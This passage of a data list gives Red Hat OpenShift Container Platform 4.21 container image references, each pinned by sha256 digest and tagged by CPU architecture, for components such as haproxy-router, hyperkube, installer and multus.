"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:fff15ac26ca10cbbdd23fcf4510a4b2b69c01de3fce1d70ae016933237e8676e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:2625f633345e56a2c008602b6489037488fc9054ff973cae80939ab88cc19d8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b571a143b03ff7d75ad86bbd890817a644ef5b52de0881e2beb1e8f25c056ecd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:7cdd19649ef45a859affbcda295276a1c1b356f20be2ba11db57b713ddd432c9_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:eea66c84f7e2f69e9fbefc1b58ec9e544c1b6c3320bb631dbe2240a8737b600d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:d8c47e73a2fd940fc9162adbbd62341086bd61376a830dfa270eeaed7621dc46_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ee3b692430aea38ad28dc9a7cf80a579ca8341d355372852ac7e69b2aaff30e4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5484533f421052d86a8d6ba388f38f3feb68e7a2e015a7123da87b7b4c7980b6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:7406513da534756c4929f48e1a765a026e129ca0f61d49d415374f8e15c11c5a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:b80d2f4064ca975b20a8111782afce45f005a6ec12a78d8d3f9d544b30bb2a27_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:45eaefe5b35fc9fb7755ea44fca6b12a1ab7e65d933055e98bdf458b6ba5e50d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:c1977cc007191a46853b0a3915c45e9561664d4e06516ef1a04e8562df31420c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:47db252dd861d805da4299bc67982e1472777ae0484edc17c43d6f0bcac74c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4ea870b393120ff9a209eb91c1694ab03e340cd92e0bf45574a386bd715ab1af_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:77d16684819289af124e53b26a96c187bc848d23fa00a054fd4253c922e21ac8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:94b8f7046824d7fc258908303d0dd7dea98dffdb71da75473741701d5630fd43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:a3954de25adc3d89613106ebb867d565ffe356b4febb3b9c1470d46bdd4a8547_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c7fa7dc7e546ef6d5b322e521bdbf86e7be13859167e071839d6164a128b5954_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:303710848cd4644e4235da51f011840fae00d5b30df2f55cad1fe3bb91c0ce41_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:7faae8cecca99097bc78c149ff89aaf22ab736bd159983233c569fb79f59f315_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:df2d51c852854930ef5a93f74c83c11df4e7042bee92bb7c33366f648dbe3b41_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:e176cc10b2b9b4b8659796de90b1680c040f79c0f0403f0ef534652144128f7a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:023d697b90f072bb4c7caab8ff197eaaa38a6c2c77b1c9ce05e569061fb87ce7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:257e4cd3d8aca92de36e31ffefb6e9b286c602a32ae1c3f63e4fc59cbd1e4291_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:d25b4e91c945b9beda5248f7ff1b108d3f334748fb2dfcb9d46be984925f194d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:e979034a8badf7cc5b0091f97e3e8d2e7b4db1e14aa71256974e7ad58324bfc3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:b973fa55da388a8ed7dc04cb6f84da7e5f2ae1e015300130c44a3ccf7502939d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:c8c48ba4ef25cf37ddfc8608146b64c4d7d881b15bbe42a1d3390bfc9bec1709_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:98c91c5062e8d7e164e71ba67cf154a2e7ebd7de83a65f622c3cefcff573e9e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e07d700e6f778cf8569cc916351b1eb79ef7abbfb34e556503d276f72a21b0fe_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:82c763564d85a635ca0815947d90786d847855f6759d091818d35cb260b807d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:8a558ee0c2898ad2d4af602a4cf7e13d5f4bac6fafc958088ce0af1ad6b23abf_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:128f1ceb7f59758ea0001dbc24659a199a519f077c89c686574d577f9082598b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:ddb73dd86afdfb11fd4d2f2ca9323a72e9ab3030026f3bc48238513a3fab8c75_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:1df147ec39f8163f0d3071c46e0cc2b6bf2e0ca3a72d98cb01337e1e15d3df0b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:43f06bfcf33a143963b6f2f459e2348977d20639165881d3c94fc50504ff589d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:be44136cdbbda20d1628aefa40838aceeb7d0a6009e4e182ea886ae561e5df68_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:cc22af0f83fccd128938409d0d7adc4584b9232d73e9be2f4f57d6189d3a70f8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:27255764d47f35147d02850500d774d54c4216c802d2cfb01c0ab555540a85f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:49129f16b6f9dee24e02c0972ebaa059b4a86976d4dc612f129a7f576a8bb01a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:9a37dc47bb380727304270fb8e508f4e2f638ae70a5c90c055d212bf72368488_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:0b449cd4c58e81397bc99ba2d0970585d2a3cc1472a8134b46cf20e8c488b8c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:18ac01a31557a6a6b97d34d8cae22ffbd27e3f9ec3d5f63e45c78cbf07020044_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:a37e5b31b6b72957a891fc6a9186b33a810109ccbd55e30cfbb4c4eaadb70be4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:145ba54fe931a01cab8cef5d1d1535a1f3b719403b000e2b34256d7ede7ec6f8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:92a8781fdc3b5f1db9a5c578b6685dc56093a1d5c273ee3abc6270ee9400387e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:fd42f2dec072128bf5f2838c94a1d7c806c76a040e71150671f97c1d82a0276d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:3d02603962035bdee1a13b1b0d17740cc9c5bcdc89f2372652e5a7dd907ca313_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:7cd0ca58e7ebd7d6f24025a8d3fb64c4026e54490d353af970d0fc0ff51c47a4_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:a5c0bd42f2ffe7c2d87f8c5ecb5910a64bb63bdceac83669cb38b5180907e052_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b98ba3b15b09a6308b2683aa2740c02ca6c552a866845887e2ca6f5aad6c133a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:06a7767e01204923e118d012ee39152119980e1d59db0810aac1ddf27af2abdf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:0b83daa834cf9df259d8fd475c2678d92c6dd44ed697a96c24ac8921a972b58f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:1379cb01ad37cd0e9485c04dbe8ed2fa8eef5eac26a5c9b12277bda753d80305_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:68934420721c5ebe998524dbacea9d8242080a7e7949efc753236c4c28c57edf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:036574a35e17a571639d3f885f5699462f7ad81e5b2ddc445259eea543f54daa_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:1a8d2b216d3d35f3d94b8ce9796e3df908550d7e323e2d034dd5ef38a2f4990b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:52131756a73a6e25eadcf416566a3e46e2fa2319e3e5ec9cf68b707045e1c6b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:5d3761ab41937e14fd4b1bd4d93e01d3fc234552c14dd4a36026afe2a656229c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:795541dbfc7bb3bda387c4f1647233c0f1ace2abcf3e74d99c4ce6f48abc7edc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:ac5b7d8a01e37587166f1526c80776770c07821056b23f10b9d1d0801a09503f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:2e237915caa1fc0afa9af6fecd82ba8820da8a624e1408f7a4cf4eca9e0143b9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:6decd3b60d897571e96a3b6f468e1dbcec4ca95b871088916d2b03241c25a033_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:8fbf341238b95948d702ad7a7909113c4eb5d670f06d4d3be3cb6a6f6594c05e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:ab0b0d0164deea8407004db4c43be6d6626fcb35dee99f9a75e2fd5bfca244b9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:b41028530a79f61694e118c620aab19a115088725164e8c722de2671c7eb75a5_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:1e7f9f39328a9e5c080ba7e18a7a1c17a179c36816d4394d8f1aa8e38cd0d889_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:2427ae0356c24a0f1f1b48a5fa27ec0a853b27ac613b3dcdf446b262fa05283c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:38bddd418fcb1a18484126c2095e6ae2c1bdee8e9667c8b34d7c423851105410_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eb3b40f400c13c67de4aa77a3dcde6fa23a03b6ef172c6a3ac8762cee620608b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:73e70d522fb58b91a88bf3b47211295ee9f800394c5367772dec9a3bbdc0c513_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a44c7d7358f6e6323c1898ea14923840a93d99447233c7f10fa1d3975b096bbd_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:a98950f3880fe0bd22db370def7b4e5cc596efcc1e50e82ff983d59deebcbc87_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:cd112562715fcf7a10c911b471d3e5667fb8b2aa3a4d7d2d42edf99008ab01ea_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:0c9bb9ad12077b33f55b6696106afb58e0750f983c4f15edf0366244dbf4c58c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:3795c200441089d373eaf98d9c1d3e1f4769c46bf0d8b8ac71e2f9eb2e5e3006_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:97b0fa634ba8534de5bb4c01447aa1c530be3a669fdae7657fefb6b4f981092f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dfaa865808eee13a1df4f8e40201a3fadd6dd2e88b0d89880a2f5b81e635a820_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:0932593cd3bb6cd2e2b9ecad5e3bbe2fdcd107785ab3f8b25596f4901d8ae33a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:33db1ea4989248c3760120da28f516110c25bec461090bed2b200505b3357470_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:7070ef2a6495712f2aa282baf40d7beabd5904b3256993681d573d83e172cbb6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:9848868d7c2cdaecfe67a0acf26fef5ac0497a9767698a185610e52918c9a9d3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:a3ee3f96cdebcae610e6b96a57cb03c127a4517a7db3db434243ab6e3238b78b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb61e8a96ed0bd890b7e2ee52bffd6402ccca92e056fb43bb4c577f83eff2a1d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:fb7894f06fee976d9c964bfec6eb72ed16fa9309de40508610fb2e031cd86035_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:43b10a72c5d7f3e182414dc3edebe2ebeeb2a4af0c4349a65e49e5bb1a789ba2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a0eb4b703137f0acc68e4aa57032dc2b49d5ffd61f88fb0439e40bc1e0c1ef85_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:f77c2640a03260c85cdbaac6d50ad464c726bca3f744e3967989d194f46d1892_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:5fd3dcbd54108018a438b849eb89f35b4c34343cb5319fbfb30cf252e2a58a8f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7fe49c50219736630f128889b00b583d41a09297ac6888e2cf5d4f8b3f6aa54_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b87756166b86bc4b21e67c761d6fd90c0117b0cf740874b0c4df3531a4c7a1d2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:15e5091704189fa9c3e99b69ca9755ede680de717143e7458179826b7211bba7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eca257588b7ff0021eb3b25fad905cb90dd57b64fa26d1f0d0f2e5b75ba09996_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:f34b8488fa14562e7f1849599f0121aa8191f408bb0ea1b3151df11c7c3091ce_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:14210744d7b829c6c23f871ba63f68dd81c9b73766f5661e1d2d32213c4803f1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:b65bfa071caa14408e3d4f2a3485e2f5d8edcdebeb24280000fb4efaa162a731_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:c3da1b1a1dc130b1757de265fc527a5b9b017b4b216d6f917607bf18699fb951_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:ea60b96bc780faa5904ab8ccffc93154ea5a015c6b367e0c265032d867d362cd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:11960904264550e682164523f55396703b1cbbaa96dd7036e03e6be797d18937_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b6a81dba2bf98fabbc34dd4d9f2085a103a1234d52154e38baa3b80d6539d3d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5e61f9895dd3c359917209aaa56cb9a1fba5e7b7946348f44ff1301045f0d1f0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:afe0287c049d7aeaf14cf70f515637e31ddc553c8c2dc285f05fb6fcadd45a3b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:21d7e4128260488050af9719a2d28f408615f44a49265503b797f35215f76ca7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:4f496dc6fd91b97c5793449bd16640846cf3fd7d517193b660d796116b5f42e2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:703bf81093cc684e4e3b5f50b95411654437361ffe9b6eb54a7e1ab2e4bd86b6_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:939f3334417609fa2a140629d6bc3ab13cc99128da92b32c5b437820422875b0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:4def742b6a5ef27c09ac9540e132622ec7178284d8900b9a844cb425e8be0c94_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:6961835f3eac4677fd6738bf0b02fc6f4742e1f9de0654b44be7a56646317625_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:7c99dbb97255a082834a744bdb8821e85b97166f241c0efea2eb5a71a6b31cce_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:cd11a61958693a33f6c1013c564a2ea8adb25cb0a2791c22ed862db7f14d06cd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:3a46cffa13a3c2a354b734f98ddb200fb2a8436f9d8bf97fbfa87b81713a63aa_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:43e816c2f891134e527145559d700e6b393b9ccec1e3c51ab45dc3ba4ac5f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:df0b23ef13ea92efbc083c453d2543401dd22cf0a593ee8d594dd29447d95924_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e93849c65903929172f7ee0639d477ec569297cc5b8210550ad973c7b5a46685_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:679519366ae6b8fd4f48a2342a0dc29392c9bb4c970fd63a41fd651b920d3989_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:7b1fff7c34072d0d46fe4b45348d6ac3bf755ac0bde3a30f313ffb23a64b764c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:e9ab761cb5e82d2de804f0d95bf729601f2324d8bc11519c17cee964c55799c1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:d6a1551a5182293d917f662c42fc6b78c53577d57eaa97490a1a59a436ea2a1a_amd64",
